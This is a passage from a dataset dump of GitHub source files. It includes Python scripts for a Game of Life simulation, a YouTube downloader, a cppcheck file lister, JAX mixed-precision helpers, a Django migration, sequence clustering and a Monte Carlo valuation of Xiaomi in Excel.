94.721927%\n'''","repo_name":"lmichitakal/lab","sub_path":"NLP_tutorial/tutorial05/tutorial05.py","file_name":"tutorial05.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22968315809","text":"# Melyik szám a nagyobb?\n\nszam1 = int(input(\"Kérlek add meg az első számot: \"))\nszam2 = int(input(\"Kérlek add meg a második számot: \"))\nszam3 = int(input(\"Kérlek add meg a harmadik számot: \"))\n\nif szam1 > szam2 and szam1 > szam3:\n print(\"Az első szám a nagyobb\")\nelif szam2 > szam1 and szam2 > szam3:\n print(\"A második szám a nagyobb\")\nelif szam3 > szam2 and szam3 > szam1:\n print(\"A harmadik szám a nagyobb\")\nelif szam1 == szam2 == szam3:\n print(\"Mindhárom szám egyenlő!\")","repo_name":"peterteszary/Vasvari-Code-Repository-For-Study-Purposes","sub_path":"Python Projects/Practice3/melyik-szam-a-nagyobb-3-szammal.py","file_name":"melyik-szam-a-nagyobb-3-szammal.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"hu","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42728240643","text":"\ndef pirntGrid(Grid):\n row = len(Grid)\n col = len(Grid[0])\n\n for x in range(row):\n for y in range(col):\n print (Grid[x][y],end = ''),\n print(\"\")\n\n\n\ndef sumCell(Grid,x,y):\n row = len(Grid)\n col = len(Grid[0])\n\n sum = 0\n\n for a in range(x-1,x+2):\n for b in range(y-1,y+2):\n if a<0 or a>row or b < 0 or b > col:\n continue\n elif a == x and b == y:\n continue\n else:\n sum = sum + Grid[a][b]\n \n return sum\n\ndef Generate(Grid):\n row = len(Grid)\n col = len(Grid[0])\n temp = [[0 for i in range(col)] for j in range (row)]\n\n for x in range(row):\n for y in range(col):\n sum = sumCell(Grid,x,y)\n \n #when itself is alive\n if Grid[x][y] == 1:\n # case when it die\n if sum <= 1 or sum >= 4:\n temp[x][y] = 0\n else:\n temp[x][y] = 1\n #when itslef is died\n else:\n if sum == 3:\n temp[x][y] = 1\n else:\n temp[x][y] = 0\n \n return temp\n\n\n\n\nprint(\"first\")\nFirst = [[1,1,1,1,1,1],[1,1,1,1,1,1],[1,1,1,1,1,1],[1,1,1,1,1,1]]\npirntGrid(First)\nprint(\"second\")\nsecond = Generate(First)\npirntGrid(second)\n\n\n\n","repo_name":"YizhenS/Game-of-life-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34831785924","text":"from pytube import YouTube\n\ndef Download(link):\n youtubeObject = YouTube(link)\n youtubeObject = youtubeObject.streams.get_by_resolution(\"720p\")\n\n try:\n youtubeObject.download(\"Downloads\")\n except:\n print(\"There has been an error in downloading\")\n print(\"This download has completed!\")\n\nlink = input(\"Put your youtube link here! URL: \")\nDownload(link)","repo_name":"randhana/Python-YT-Downloader","sub_path":"YouTube_Downloader.py","file_name":"YouTube_Downloader.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73563716906","text":"#!python3\nimport fnmatch\nimport os\nimport sys\n\nsources = [\n {'dir': 'Code', 'exclude_masks': ['Tools/*', 'Sandbox/Editor/*', 'Libs/*', 'Game_Hunt/*', 'Game03/*', 'SDKs/*']},\n]\n\n\ndef matches_any_of(filename, masks):\n \"\"\"\n :param filename: Filename to check.\n :param masks: List of masks against which to check the filename.\n :return: True if filename matches any of the masks.\n \"\"\"\n name = filename.lower().replace('\\\\', '/')\n for mask in masks:\n mask = mask.lower().replace('\\\\', '/')\n if fnmatch.fnmatch(name, mask):\n print(\"{} matches {}\".format(name, mask))\n return True\n return False\n\n\ndef process_folder(out_files, folder, exclude_masks):\n \"\"\"\n Walk the specified directory, runnin cppcheck against all .cpp and .c files in it,\n unless the file path matches any of the exclude_masks, in which case, skip it.\n :param out_files: [out] List of files in the specified folder that CppCheck should process.\n :param folder: Folder to parse.\n :param exclude_masks: List of filename masks to skip.\n :return: None.\n \"\"\"\n for dirpath, dirnames, filenames in os.walk(folder):\n # If a directory matches an exclude path, so will all the files it contains.\n if matches_any_of(dirpath, exclude_masks):\n continue\n\n for filename in filenames:\n filepath = os.path.join(dirpath, filename)\n\n # Force lower case just incase somebody has named their file strangely (for instance, \"file.C\")\n if os.path.splitext(filename.lower())[1] not in ['.cpp', '.cxx', '.c']:\n continue\n\n # If the file path matches any of the exclude masks, we are deliberately ignoring it.\n if matches_any_of(filepath, exclude_masks):\n continue\n out_files.append(filepath)\n\n\ndef main(argv):\n if len(argv) != 3:\n print(\"Usage: python3 prepare_filelist_for_cppcheck.py base_folder output_list_filename\")\n return 1\n\n base_folder = os.path.abspath(argv[1])\n\n files = []\n\n for src in sources:\n src['exclude_masks'] = [os.path.join(base_folder, src['dir'], x) for x in src['exclude_masks']]\n process_folder(files, os.path.join(base_folder, src['dir']), src['exclude_masks'])\n\n with open(argv[2], 'w') as file:\n for f in files:\n f = os.path.abspath(f)\n f = os.path.relpath(f, base_folder)\n file.write(f.replace('\\\\', '/') + '\\n')\n\n return 0\n\n\nif __name__ == \"__main__\":\n res = main(sys.argv)\n sys.exit(res)\n","repo_name":"HanetakaChou/CryEngine-5.2.3","sub_path":"Code/Tools/cppcheck/prepare_filelist_for_cppcheck.py","file_name":"prepare_filelist_for_cppcheck.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"32464655873","text":"from brachy import structure_util as su\nfrom jax.tree_util import tree_map, Partial\nfrom jax import numpy as jnp\nfrom jax import custom_vjp\nfrom jax import custom_jvp\n\n\nimport jax\n\n\n\ndef _cast_fp16(x):\n if jnp.array(x).dtype==jnp.float32:\n return jnp.array(x).astype(jnp.float16)\n else:\n return x\n\ndef _cast_fp32(x):\n if jnp.array(x).dtype==jnp.float16:\n return jnp.array(x).astype(jnp.float32)\n else:\n return x\n\ndef fp16_apply(apply):\n def new_apply(tree, global_config, *args, **kwargs):\n params_dtypes = tree_map(lambda x: jnp.array(x).dtype, tree['params'])\n buffers_dtypes = tree_map(lambda x: jnp.array(x).dtype, tree['buffers'])\n tree['params'] = tree_map(_cast_fp16, tree['params'])\n tree['buffers'] = tree_map(_cast_fp16, tree['buffers'])\n args = [tree_map(_cast_fp16, arg) for arg in args]\n kwargs = {k: tree_map(_cast_fp16, v) for k, v in kwargs.items()}\n \n state, value = apply(tree, global_config, *args, **kwargs)\n\n state['params'] = tree_map(lambda x, t: jnp.array(x).astype(t), state['params'], params_dtypes)\n state['buffers'] = tree_map(lambda x, t: jnp.array(x).astype(t), state['buffers'], buffers_dtypes)\n \n value = tree_map(_cast_fp32, value)\n\n return state, value\n return new_apply\n\ndef high_precision_apply(apply):\n def new_apply(tree, global_config, *args, **kwargs):\n args = tree_map(_cast_fp32, args)\n kwargs = tree_map(_cast_fp32, kwargs)\n \n state, value = apply(tree, global_config, *args, **kwargs)\n \n value = tree_map(_cast_fp32, value)\n\n return state, value\n return new_apply\n \n\ndef cast_node(node, path):\n node = su.copy_to_leaf(node)\n node['aux']['mixed_precision'] = {\n 'old_apply': node['apply']\n }\n if 'force_high_precision' in node['aux'] and node['aux']['force_high_precision']:\n node['apply'] = high_precision_apply(node['apply'])\n return node\n\n node['apply'] = fp16_apply(node['apply'])\n\n return node\n\ndef cast_tree_f16(tree):\n mixed_precision_buffers = tree['buffers']['mixed_precision']\n del tree['buffers']['mixed_precision']\n\n half_tree = su.structure_tree_map(cast_node, tree)\n half_tree['buffers']['mixed_precision'] = mixed_precision_buffers\n return half_tree\n \ndef cast_back(tree):\n half_params_buffers, rest = su.split_tree(tree, [['params', 'buffers'], ['aux', 'apply']])\n mixed_precision_buffers = half_params_buffers['buffers']['mixed_precision']\n del half_params_buffers['buffers']['mixed_precision']\n types = mixed_precision_buffers['types']\n\n def cast(x, t):\n return x.astype(t.dtype)\n\n params_buffers = tree_map(cast, half_params_buffers, types)\n params_buffers['buffers']['mixed_precision'] = mixed_precision_buffers\n return su.merge_trees(rest, params_buffers)\n\n\n@custom_vjp\ndef scale_in_backwards(x, s):\n return x\n\ndef scale_in_backwards_fwd(x, s):\n return scale_in_backwards(x, s), s\n\ndef scale_in_backwards_bwd(s, g):\n return g * s, 0.0\n\nscale_in_backwards.defvjp(scale_in_backwards_fwd, scale_in_backwards_bwd)\n\n# currently assumes first argument of loss is the tree and second return value is the loss.\ndef mixed_precision_loss(loss):#, loss_scalar=1.0, output_type=jnp.float32):\n # loss_scalar = jnp.array(loss_scalar)\n def mixed_loss(tree, *args, **kwargs):\n\n loss_scalar = tree['buffers']['mixed_precision']['loss_scalar']\n output_type = tree['aux']['mixed_precision']['output_type']\n # half_tree = su.structure_tree_map(cast_node, float_tree)\n # half_tree['buffers']['mixed_precision'] = {\n # 'loss_scalar': jnp.array(loss_scalar, dtype=jnp.float16),\n # }\n\n # half_tree['aux']['mixed_precision'] = {\n # 'output_type': output_type\n # }\n tree = su.map_params_buffers(lambda x: scale_in_backwards(x, 1.0/loss_scalar), tree)\n (tree, value, *rest) = loss(tree, *args, **kwargs)\n value = scale_in_backwards(value, loss_scalar.astype(output_type))\n return (tree, value, *rest)\n return mixed_loss\n\n\ndef mixed_precision_tree(tree_and_config, loss_scalar=1.0, output_type=jnp.float32):\n float_tree = tree_and_config[0]\n config = tree_and_config[1]\n\n root_apply = float_tree['apply']\n half_tree = su.structure_tree_map(cast_node, float_tree)\n\n half_tree['buffers']['mixed_precision'] = {\n 'loss_scalar': jnp.array(loss_scalar, dtype=jnp.float16),\n }\n\n half_tree['aux']['mixed_precision'] = {\n 'output_type': output_type\n }\n\n config['mixed_precision'] = True\n\n return half_tree, config\n","repo_name":"optimizedlearning/brachy","sub_path":"brachy/optim/mixed_precision.py","file_name":"mixed_precision.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70502009388","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Constituency',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('constituency_name', models.CharField(max_length=255)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Party',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('party_name', models.CharField(max_length=255)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Question',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('will_you_vote', models.BooleanField()),\n ('constituency', models.ForeignKey(to='vote.Constituency')),\n ('party', models.ForeignKey(to='vote.Party')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"crackersthecat/voting-straw-poll","sub_path":"vote/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1155363885","text":"#!/usr/bin/env python\nimport biotools.sequence as sequ\nimport biotools.IO as io\nimport biotools.translate as tran\nimport biotools.clustal as clustal\nimport biotools.analysis.options as options\ntry:\n import Queue as queue\nexcept ImportError:\n import queue\nimport hashlib\nimport subprocess\nimport threading\nfrom os import sep, mkdir\n\n\ndef run(direc, inputs):\n '''\n Takes a collection of files generated by gene prediction, creates clusters\n based off of the genes that have homology to those predicted genes, and\n creates new fasta files in the clusters sub directory under the given\n directory and separated according to whether they are nucleotide or amino\n acid sequnces. These new fasta files are then used to create clustalw\n alignments of the genes if more than 1 sequence exists in the fasta file.\n '''\n\n clusters = {}\n all_ids = set()\n ids = {}\n q = queue.Queue()\n filenames = []\n\n def run_clustal():\n while not q.empty():\n cid = q.get()\n dig = hashlib.md5()\n dig.update(' '.join(cid))\n dig = dig.hexdigest()\n\n fpre = direc + 'nt' + sep + dig\n apre = direc + 'aa' + sep + dig\n fname = fpre + \".fasta\"\n aname = apre + \".fasta\"\n\n fh = io.open(fname, 'w')\n ah = io.open(aname, 'w')\n for ipt in clusters:\n counter = 0\n name = '_'.join(ipt.split(sep)[-1].split('.')[0].split())\n for cluster in clusters[ipt]:\n if cid & cluster[0]:\n nm = name + '_' + str(counter)\n seq = cluster[1]\n curr = sequ.Sequence(nm, seq, defline=', '.join(cid))\n tr = tran.translate(curr)\n tr.name = curr.name\n fh.write(curr)\n ah.write(tr)\n counter += 1\n fh.close()\n ah.close()\n\n try:\n clustal.run(fname, fpre + '.clustalw')\n clustal.run(aname, apre + '.clustalw')\n filenames.append(dig + '.fasta')\n except ValueError:\n pass\n\n q.task_done()\n\n if direc:\n for d in [direc, direc + 'nt' + sep, direc + 'aa' + sep]:\n try:\n mkdir(d)\n except OSError:\n pass\n\n for ipt in inputs:\n seqs = {}\n ids[ipt] = set()\n for seq in io.open(ipt, 'r'):\n ids[ipt].add(seq.name)\n all_ids.add(seq.name)\n if seq.seq not in seqs:\n seqs[seq.seq] = set()\n seqs[seq.seq].add(seq.name)\n clusters[ipt] = [(seqs[k], k) for k in seqs]\n del seqs\n\n sub_ids = []\n while all_ids:\n cid = all_ids.pop()\n subcluster = (all_ids | set([cid])) & \\\n set(i for ipt in clusters for cluster in clusters[ipt]\n for i in cluster[0] if cid in cluster[0])\n\n for ipt in clusters:\n for cluster in clusters[ipt]:\n if cid in cluster[0]:\n subcluster = (subcluster & cluster[0]) | \\\n (subcluster - ids[ipt])\n sub_ids.append(subcluster)\n all_ids -= subcluster\n\n for cid in sub_ids:\n q.put(cid)\n\n threads = []\n for i in xrange(options.NUM_PROCESSES - 1):\n curr = threading.Thread(target=run_clustal)\n threads.append(curr)\n curr.start()\n run_clustal()\n q.join()\n return filenames\n","repo_name":"sonwell/biotools","sub_path":"src/analysis/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"2874639727","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[195]:\n\n\nimport xlwings as xw\nfrom xlwings import constants\nimport pandas as pd\nimport random\nimport numpy as np\nfrom numpy.random import uniform\nimport matplotlib.pyplot as plt\n\n\n# lets connect the excel document\n\n# In[196]:\n\n\nbook=xw.Book(\"xiaomi PYTHON.xlsm\")\nbook.sheets\nassumptions_sht = book.sheets(\"Python simulation\")\nsimu_sht=book.sheets(\"Python output\")\n\n\n# # 1) Initialize parameters \n\n# In[197]:\n\n\nnum_sim = 1000\n\n# growth (smartphone) \ng1_low=assumptions_sht.range('l9').value\ng1_mid=assumptions_sht.range('m9').value\ng1_high=assumptions_sht.range('n9').value\n# growth (TV)\ng2_low = assumptions_sht.range('l10').value\ng2_mid = assumptions_sht.range('m10').value\ng2_high = assumptions_sht.range('n10').value\n# growth (Internet)\ng3_low = assumptions_sht.range('l11').value\ng3_mid = assumptions_sht.range('m11').value\ng3_high = assumptions_sht.range('n11').value\n\n# growth (others)\ng4_low = assumptions_sht.range('l12').value\ng4_mid = assumptions_sht.range('m12').value\ng4_high = assumptions_sht.range('n12').value\n\n#cost 1\nc1_low=assumptions_sht.range('l15').value\nc1_mid=assumptions_sht.range('m15').value\nc1_high=assumptions_sht.range('n15').value\n#cost2\nc2_low = assumptions_sht.range('l16').value\nc2_mid=assumptions_sht.range('m16').value\nc2_high=assumptions_sht.range('n16').value\n\n#cost3\nc3_low = assumptions_sht.range('l17').value\nc3_mid=assumptions_sht.range('m17').value\nc3_high=assumptions_sht.range('n17').value\n\n#cost4\nc4_low = assumptions_sht.range('l18').value\nc4_mid=assumptions_sht.range('m18').value\nc4_high=assumptions_sht.range('n18').value\n\n#SG&A\nsga_low = assumptions_sht.range('l20').value\nsga_high = assumptions_sht.range('n20').value\n\n#R&D\nrd_low = assumptions_sht.range('l21').value\nrd_high = assumptions_sht.range('n21').value\n\n#beta unlevered\nbetaun_mean=assumptions_sht.range('J24').value\nbetaun_std=assumptions_sht.range('K24').value\n\n#RONIC\nroic_mean = assumptions_sht.range('J25').value\nroic_std = assumptions_sht.range('K25').value\n\n#perpet growth\npg_mean =assumptions_sht.range('J26').value\npg_std = assumptions_sht.range('K26').value\n\n#ev/ebitda\nev_ebitda_low = assumptions_sht.range('l27').value\nev_ebitda_mid = assumptions_sht.range('m27').value\nev_ebitda_high = assumptions_sht.range('n27').value\n\n#ev/sales\nev_sales_low = assumptions_sht.range('l28').value\nev_sales_mid = assumptions_sht.range('m28').value\nev_sales_high = assumptions_sht.range('n28').value\n\n#equity market premium\nemp_mean =assumptions_sht.range('J29').value\nemp_std = assumptions_sht.range('K29').value\n\n\n# # 2) define law of distribution for each variable\n\n# In[198]:\n\n\ndef dcf_function (num_sim, g1_low, g1_mid,g1_high, g2_low, g2_mid,g2_high,g3_low, g3_mid,g3_high,g4_low, g4_mid,g4_high,\n c1_low,c1_mid,c1_high,c2_low,c2_mid,c2_high,c3_low,c3_mid,c3_high,c4_low,c4_mid,c4_high,sga_low,sga_high,\n rd_low,rd_high,betaun_mean,betaun_std,roic_mean,roic_std,pg_mean,pg_std,ev_ebitda_low,ev_ebitda_mid,\n ev_ebitda_high,ev_sales_low,ev_sales_mid,ev_sales_high,emp_mean,emp_std):\n simu_sht.clear()\n outcome = []\n \n for i in range (num_sim) :\n # a) growth rate (triangular distribution)\n g1_rate = np.random.triangular(g1_low,g1_mid,g1_high)\n assumptions_sht.range('D9').value = g1_rate\n g2_rate = np.random.triangular(g2_low,g2_mid,g2_high)\n assumptions_sht.range('D10').value = g2_rate\n g3_rate = np.random.triangular(g3_low,g3_mid,g3_high)\n assumptions_sht.range('D11').value = g3_rate\n g4_rate = np.random.triangular(g4_low,g4_mid,g4_high)\n assumptions_sht.range('D12').value = g4_rate\n \n #b) costs (triangular distribution)\n c1_rate = np.random.triangular(c1_low,c1_mid,c1_high)\n assumptions_sht.range('d15').value= c1_rate\n c2_rate = np.random.triangular(c2_low,c2_mid,c2_high)\n assumptions_sht.range('d16').value= c2_rate\n c3_rate = np.random.triangular(c3_low,c3_mid,c3_high)\n assumptions_sht.range('d17').value= c3_rate\n c4_rate = np.random.triangular(c4_low,c4_mid,c4_high)\n assumptions_sht.range('d18').value= c4_rate\n \n #uniform ditribution\n sga_rate=np.random.uniform(sga_low,sga_high)\n assumptions_sht.range('d20').value=sga_rate\n rd_rate=np.random.uniform(rd_low,rd_high)\n assumptions_sht.range('d21').value=rd_rate\n \n #c) valuation assumptions unlevered beta, roic, perpetual , ev/ebitda....\n betaun_rate=random.normalvariate(betaun_mean,betaun_std)\n assumptions_sht.range('d24').value= betaun_rate\n roic_rate=random.normalvariate(roic_mean,roic_std)\n assumptions_sht.range('d25').value=roic_rate\n pg_rate=random.normalvariate(pg_mean,pg_std)\n assumptions_sht.range('d26').value=pg_rate\n ev_ebitda_rate=np.random.triangular(ev_ebitda_low,ev_ebitda_mid,ev_ebitda_high)\n assumptions_sht.range('d27').value=ev_ebitda_rate\n ev_sales_rate=np.random.triangular(ev_sales_low,ev_sales_mid,ev_sales_high)\n assumptions_sht.range('d28').value=ev_sales_rate\n emp_rate=random.normalvariate(emp_mean,emp_std)\n assumptions_sht.range('d29').value= emp_rate\n \n #d) value per share\n price=assumptions_sht.range('d2').value\n price=float(price)\n\n outcome.append((g1_rate,g2_rate,g3_rate,g4_rate,c1_rate,c2_rate,c3_rate,c4_rate,sga_rate,rd_rate,betaun_rate,\n roic_rate,pg_rate,ev_ebitda_rate,ev_sales_rate,emp_rate,price))\n df = pd.DataFrame(outcome, columns = ['Smartphone growth', 'TV growth', 'Internet Services growth', 'Others growth',\n 'cost smartphone','cost TV','cost internet services','cost others', 'SG&A cost',\n 'R&D cost','beta unlevered','RONIC','Perpetual growth TV','EV/EBITDA','EV/Sales',\n 'Equity market premium','Value per share'])\n return df\n\n\n# # 3) running the function\n\n# In[199]:\n\n\ndf = dcf_function (num_sim, g1_low, g1_mid,g1_high, g2_low, g2_mid,g2_high,g3_low, g3_mid,g3_high,g4_low, g4_mid,g4_high,\n c1_low,c1_mid,c1_high,c2_low,c2_mid,c2_high,c3_low,c3_mid,c3_high,c4_low,c4_mid,c4_high,sga_low,sga_high,\n rd_low,rd_high,betaun_mean,betaun_std,roic_mean,roic_std,pg_mean,pg_std,ev_ebitda_low,ev_ebitda_mid,\n ev_ebitda_high,ev_sales_low,ev_sales_mid,ev_sales_high,emp_mean,emp_std)\n\n\n# In[200]:\n\n\n# Append all the values in simu_sht in our excel.\nsimu_sht.range('A1').options(pd.DataFrame, index = False).value = df\n\n\n# # 4) generate graphes\n\n# #### Giving names to output\n\n# In[201]:\n\n\n#growth \ng1_column = df['Smartphone growth']\ng2_column = df['TV growth']\ng3_column = df['Internet Services growth']\ng4_column = df['Others growth']\n#costs\nc1_column = df['cost smartphone']\nc2_column = df['cost TV']\nc3_column = df['cost internet services']\nc4_column = df['cost others']\nsga_column = df['SG&A cost']\nrd_column = df['R&D cost']\n#valuation assumptions\nbetaun_column = df['beta unlevered']\nroic_column = df['RONIC']\npg_column = df['Perpetual growth TV']\nev_ebitda_column = df['EV/EBITDA']\nev_sales_column = df['EV/Sales']\nemp_column = df['Equity market premium']\nprice_column = df['Value per share']\n\n# plot style\nplt.style.use('default')\n\n\n# #### plotting the outcome\n\n# In[202]:\n\n\na=int(num_sim*0.10)\n\n# histogram of value per share\ngraph1 =plt.figure(figsize=(5,5))\nax = graph1.add_subplot(1, 1, 1)\ngraph1.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(price_column, density = True,bins = a,color='#132e57')\nplt.ylabel('Frequency (%)')\nplt.xlabel('CNY value per share')\nplt.title('Distribution of value per share', fontsize = 12,fontweight='bold')\nplt.axvline(price_column.mean(), label ='average price', color= '#ee9835')\nplt.axvline(assumptions_sht.range('g2').value, label ='Current stock price', color= '#3691a1')\n\nplt.legend()\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r1\")\nsimu_sht.pictures.add(graph1, name = 'graph1', update = True,top = rng.top,left = rng.left)\n\n# creation of cumulative distribution function\ngraph2 =plt.figure(figsize=(5,5))\nax = graph2.add_subplot(1, 1, 1)\ngraph2.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nx=np.sort(price_column)\ny=np.arange(1,len(x)+1)/len(x)\nplt.plot(x,y, marker = '.', color='#132e57')\nplt.xlabel(\"CNY Value per share\")\nplt.ylabel ('cumulated distribution')\nplt.title ('Cumulative Distribution function', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z1\")\nsimu_sht.pictures.add(graph2, name = 'graph2', update = True,top = rng.top,left = rng.left)\n\n# SG&A\ngraph3 =plt.figure(figsize=(5,5))\nax = graph3.add_subplot(1, 1, 1)\ngraph3.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(sga_column, density = True,bins = a, color = '#fa621c')\nplt.ylabel('Occurence')\nplt.xlabel('SG&A (% of Revenue)')\nplt.title('Distribution of SG&A ', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r25\")\nsimu_sht.pictures.add(graph3, name = 'graph3', update = True,top = rng.top,left = rng.left)\n\n# R&D\ngraph4 =plt.figure(figsize=(5,5))\nax = graph4.add_subplot(1, 1, 1)\ngraph4.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(rd_column, density = True,bins = a, color = '#fa621c')\nplt.ylabel('Occurence')\nplt.xlabel('R&D (% of Revenue)')\nplt.title('Distribution of R&D',fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z25\")\nsimu_sht.pictures.add(graph4, name = 'graph4', update = True,top = rng.top,left = rng.left)\n\n# growth rates\ngraph5 =plt.figure(figsize=(5,5))\nax = graph5.add_subplot(1, 1, 1)\ngraph5.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(g1_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('growth of smartphone segment (% of Revenue)')\nplt.title('Distribution of growth of smartphone segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r50\")\nsimu_sht.pictures.add(graph5, name = 'graph5', update = True,top = rng.top,left = rng.left)\n\ngraph6 =plt.figure(figsize=(5,5))\nax = graph6.add_subplot(1, 1, 1)\ngraph6.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(g2_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('growth of TV segment (% of Revenue)')\nplt.title('Distribution of growth of TV segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z50\")\nsimu_sht.pictures.add(graph6, name = 'graph6', update = True,top = rng.top,left = rng.left)\n\ngraph7 =plt.figure(figsize=(5,5))\nax = graph7.add_subplot(1, 1, 1)\ngraph7.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(g3_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('growth of Internet Services segment (% of Revenue)')\nplt.title('Distribution of growth of Internet Services segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r75\")\nsimu_sht.pictures.add(graph7, name = 'graph7', update = True,top = rng.top,left = rng.left)\n\ngraph8 =plt.figure(figsize=(5,5))\nax = graph8.add_subplot(1, 1, 1)\ngraph8.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(g4_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('growth of \"Others\" segment (% of Revenue)')\nplt.title('Distribution of \"Others\" segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z75\")\nsimu_sht.pictures.add(graph8, name = 'graph8', update = True,top = rng.top,left = rng.left)\n\n\n\n# costs\ngraph9 =plt.figure(figsize=(5,5))\nax = graph9.add_subplot(1, 1, 1)\ngraph9.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(c1_column, density = True,bins = a, color = '#fa621c')\nplt.ylabel('Occurence')\nplt.xlabel('cost of smartphone segment (% of smartphone revenue)')\nplt.title('Distribution of cost of smartphone segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r100\")\nsimu_sht.pictures.add(graph9, name = 'graph9', update = True,top = rng.top,left = rng.left)\n\ngraph10 =plt.figure(figsize=(5,5))\nax = graph10.add_subplot(1, 1, 1)\ngraph10.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(c2_column, density = True,bins = a, color = '#fa621c')\nplt.ylabel('Occurence')\nplt.xlabel('cost of TV segment (% of TV revenue)')\nplt.title('Distribution of cost of TV segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z100\")\nsimu_sht.pictures.add(graph10, name = 'graph10', update = True,top = rng.top,left = rng.left)\n\ngraph11 =plt.figure(figsize=(5,5))\nax = graph11.add_subplot(1, 1, 1)\ngraph11.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(c3_column, density = True,bins = a, color = '#fa621c')\nplt.ylabel('Occurence')\nplt.xlabel('cost of Internet Services segment (% of Internet Services revenue)')\nplt.title('Distribution of cost of Internet Services segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r125\")\nsimu_sht.pictures.add(graph11, name = 'graph11', update = True,top = rng.top,left = rng.left)\n\ngraph12 =plt.figure(figsize=(5,5))\nax = graph12.add_subplot(1, 1, 1)\ngraph12.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(c4_column, density = True,bins = a, color = '#fa621c')\nplt.ylabel('Occurence')\nplt.xlabel('cost of \"Others\" segment (% of \"Others\" revenue)')\nplt.title('Distribution of cost of \"Others\" segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z125\")\nsimu_sht.pictures.add(graph12, name = 'graph12', update = True,top = rng.top,left = rng.left)\n\n# valuation assumptions\ngraph13 =plt.figure(figsize=(5,5))\nax = graph13.add_subplot(1, 1, 1)\ngraph13.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(betaun_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('beta unlevered variation')\nplt.title('Distribution of beta unlevered variation', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = 